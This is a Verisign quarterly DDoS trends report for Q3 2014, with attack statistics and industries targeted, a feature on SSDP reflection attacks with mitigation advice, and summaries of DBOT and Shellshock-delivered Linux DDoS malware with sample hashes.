2
Executive Summary
For the period starting July 1, 2014 and ending Sept. 30,
2014, Verisign observed the following key trends:
• Attacks exceeding 10 Gbps in size increased in frequency to
account for more than 20% of all mitigations.
• Attackers were persistent in launching attacks against
targeted customers, averaging more than three separate
attempts per target.
• The most frequently targeted industry this quarter was Media
and Entertainment, representing more than 50% of all
mitigation activity.
• The largest attacks observed this quarter targeted the E-
Commerce/Online Advertising industry, the largest peaking at
more than 90 Gbps.
3
Attack StatsMitigations by Attack Size:
• Q3 attacks averaged 6.46 Gbps , a 65% increase
in average attack size from Q1 2014.
• Number of attacks 10 Gbps and above grew by
38% over Q2
• Largest volumetric UDP-based attack: 90 Gbps;
largest TCP-based attack: more than 30 Gbps.
Mitigations by Vertical:
• Media and Entertainment had the largest
volume of attacks, peaking at just over 20
Gbps in Q3.
• E-Commerce/Online Advertising attacked less
frequently, but had the largest attack of the
quarter at over 90 Gbps
Increased Attack Frequency:
• Q3 saw more than three attacks per targeted
customer
4
Q3 SSDP Attacks:
• Largest SSDP-based attacks in Q3 targeted IT Services and peaked at just under 15 Gbps
and 4.58 Mpps.
• Though amplification smaller than DNS or NTP reflection attacks, SSDP attacks can still
overwhelm organizations using traditional security appliances for protection.
• Malicious actors will spoof the source IP when making an SSDP request to target a victim.
Mitigation:
• Audit internal assets to ensure that you’re not unknowingly being used for SSDP-based
DDoS attacks
• For most organizations, SSDP implementations should not need to be open to the Internet.
• Inbound queries targeting SSDP can be blocked at the network edge
Feature: SSDP Used for Reflection AttacksIn Q3 2014, the most common attack type Verisign observed continued to be UDP reflective amplification attacks
leveraging the NTP protocol.
As Q3 progressed, Verisign observed the first instances of the Simple Service Discovery Protocol (SSDP) being
exploited in DDoS amplification attacks against customers
5
What is SSDP?• Network protocol used for the advertisement and discovery of network services
and presence information
• Most commonly used as the basis of the discovery protocol for Universal Plug-
and-Play. Implementations; sends and receives information using the UDP on
port number 1900.
• According to ShadowServer (https://ssdpscan.shadowserver.org): more than 15
million vulnerable devices that have SSDP enabled
• Attackers spoof source IP address of the request to match the intended target;
this causes all vulnerable devices to flood the target with SSDP responses.
• US-CERT alert (https://www.us-cert.gov/ncas/alerts/TA14-017A), referencing an
Internet Society article (http://www.internetsociety.org/doc/amplification-hell-
revisiting-network-protocols-ddos-abuse) identifies SSDP as having bandwidth
application factor of as much as 30.8.
6
DDoS Malware Trends: DBOT Linux DDoS Malware
In Q3, Verisign iDefense analysts discovered a variant of the DBOT backdoor which runs on Unix-like systems
and is primarily used for DDoS attacks.
• Controlled through an Internet Relay Chat (IRC) command-and-control (C&C) channel
• Will set its process name to look like common system processes (such as syslogd or crond)
• Used not only to perform DDoS attacks, but includes full reverse-shell access and mail-
sending capabilities (e.g., for spam)
• No IP address spoofing currently occurs during the execution of any of the built-in DDoS
attack commands, meaning, most observed attacker IPs will be legitimate, increasing
mitigation speed.
• Its reverse shell function allows arbitrary command execution, allowing an attacker the
unlimited ability to manually modify attack patterns or install additional DDoS tools as needed.
• Samples of the malware analyzed by iDefense have an MD5 hash of
579190b74b86f591097b9b6773c1176b.
7
DDoS Malware Trends:
“SHELLSHOCK” Used to Deploy Linux DDoS Malware
Verisign iDefense researchers analyzed ELF malware, which was observed to be delivered via the “Shellshock”
BASH vulnerability.
What is Shellshock?
• Common name for a series of critical vulnerabilities in the Bash shell application, in a wide array of operating
systems
• Caused by a flaw in the command and argument parser of GNU Bash versions 1.14 through 4.3; results in
incorrect processing of commands placed after function definitions in the added environment variable.
Behavior
• ELF malware communicates with specific hard-coded C&C servers to receive commands and links to additional
malicious contents or payloads in the form of raw Pastebin links.
• Checks for commonly used set of usernames and weak passwords to launch DDoS attacks
• Malware samples analyzed by iDefense have an MD5 hash of 5B345869F7785F980E8FF7EBC001E0C7.
© 2014 VeriSign, Inc. All rights reserved. VERISIGN and other trademarks, service marks, and designs are registered or unregistered trademarks of
VeriSign, Inc. and its subsidiaries in the United States and in foreign countries. All other trademarks are property of their respective owners.